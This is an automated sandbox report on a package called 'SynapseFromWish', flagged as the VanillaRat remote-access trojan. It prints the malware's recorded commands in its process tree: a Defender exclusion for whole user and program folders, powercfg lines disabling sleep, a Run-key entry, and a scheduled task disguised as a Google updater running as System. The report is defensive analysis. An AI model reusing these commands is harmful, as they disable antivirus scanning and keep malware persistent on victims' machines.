Analysis
-
max time kernel
22s -
max time network
79s -
platform
windows10-2004_x64 -
resource
win10v2004-20230831-en -
resource tags
arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system -
submitted
12-09-2023 08:29
Behavioral task
behavioral1
Sample
SynapseFromWish/injector.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
SynapseFromWish/injector.exe
Resource
win10v2004-20230831-en
Behavioral task
behavioral3
Sample
SynapseFromWish/release-v2.exe
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
SynapseFromWish/release-v2.exe
Resource
win10v2004-20230831-en
Behavioral task
behavioral5
Sample
SynapseFromWish/start.bat
Resource
win7-20230831-en
Behavioral task
behavioral6
Sample
SynapseFromWish/start.bat
Resource
win10v2004-20230831-en
General
-
Target
SynapseFromWish/start.bat
-
Size
52B
-
MD5
e078b3e0a3e8e4991e860eb41291c825
-
SHA1
29c7490038d188305c873d95794bb09a10c8e3fb
-
SHA256
5efe557c07c98300d0bd0b153f8e788cbbd26c25aa9eeef93848a2137bbf0782
-
SHA512
5881c68f281b2ab61a682b3bdf873aa2eb78f2f2dbdc7ae9a8317f6e9b2a6dc73c50c29af7d2d678f705b464985801bd6d9d7b58441cb9897d6fa851e4d9fc91
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
release-v2.exedescription pid process target process PID 3340 created 3276 3340 release-v2.exe Explorer.EXE PID 3340 created 3276 3340 release-v2.exe Explorer.EXE PID 3340 created 3276 3340 release-v2.exe Explorer.EXE PID 3340 created 3276 3340 release-v2.exe Explorer.EXE -
VanillaRat
VanillaRat is an advanced remote administration tool coded in C#.
-
Vanilla Rat payload 4 IoCs
Processes:
resource yara_rule behavioral6/memory/1616-0-0x00000000002F0000-0x0000000000312000-memory.dmp vanillarat C:\Users\Admin\AppData\Roaming\injector.exe vanillarat C:\Users\Admin\AppData\Roaming\injector.exe vanillarat C:\Users\Admin\AppData\Roaming\injector.exe vanillarat -
Drops file in Drivers directory 1 IoCs
Processes:
release-v2.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts release-v2.exe -
Executes dropped EXE 1 IoCs
Processes:
injector.exepid process 624 injector.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
injector.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\injector = "C:\\Users\\Admin\\AppData\\Roaming\\injector.exe" injector.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
release-v2.exedescription pid process target process PID 3340 set thread context of 796 3340 release-v2.exe dialer.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
release-v2.exepowershell.exedialer.exepowershell.exepid process 3340 release-v2.exe 3340 release-v2.exe 680 powershell.exe 680 powershell.exe 680 powershell.exe 3340 release-v2.exe 3340 release-v2.exe 3340 release-v2.exe 3340 release-v2.exe 3340 release-v2.exe 3340 release-v2.exe 796 dialer.exe 796 dialer.exe 4704 powershell.exe 4704 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
injector.exepowershell.exedialer.exepowershell.exedescription pid process Token: SeDebugPrivilege 1616 injector.exe Token: SeDebugPrivilege 680 powershell.exe Token: SeDebugPrivilege 796 dialer.exe Token: SeDebugPrivilege 4704 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
cmd.exeinjector.exerelease-v2.execmd.exedescription pid process target process PID 3108 wrote to memory of 1616 3108 cmd.exe injector.exe PID 3108 wrote to memory of 1616 3108 cmd.exe injector.exe PID 3108 wrote to memory of 1616 3108 cmd.exe injector.exe PID 1616 wrote to memory of 624 1616 injector.exe injector.exe PID 1616 wrote to memory of 624 1616 injector.exe injector.exe PID 1616 wrote to memory of 624 1616 injector.exe injector.exe PID 3108 wrote to memory of 3340 3108 cmd.exe release-v2.exe PID 3108 wrote to memory of 3340 3108 cmd.exe release-v2.exe PID 3340 wrote to memory of 796 3340 release-v2.exe dialer.exe PID 2136 wrote to memory of 180 2136 cmd.exe powercfg.exe PID 2136 wrote to memory of 180 2136 cmd.exe powercfg.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\start.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exeinjector.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Users\Admin\AppData\Roaming\injector.exe"C:\Users\Admin\AppData\Roaming\injector.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:624
-
-
-
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exerelease-v2.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3340
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3276
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:680
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:180
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:540
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4272
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eszkltr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 460 -p 612 -ip 6121⤵PID:2280
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 664 -ip 6641⤵PID:3796
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 532 -p 60 -ip 601⤵PID:3484
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
114KB
MD5311b5c55bcd7a7bf987d264a3904770e
SHA17df136430c19887e24cff480d6346dc9e75d2029
SHA256680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504
SHA512686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271
-
Filesize
114KB
MD5311b5c55bcd7a7bf987d264a3904770e
SHA17df136430c19887e24cff480d6346dc9e75d2029
SHA256680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504
SHA512686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271
-
Filesize
114KB
MD5311b5c55bcd7a7bf987d264a3904770e
SHA17df136430c19887e24cff480d6346dc9e75d2029
SHA256680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504
SHA512686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271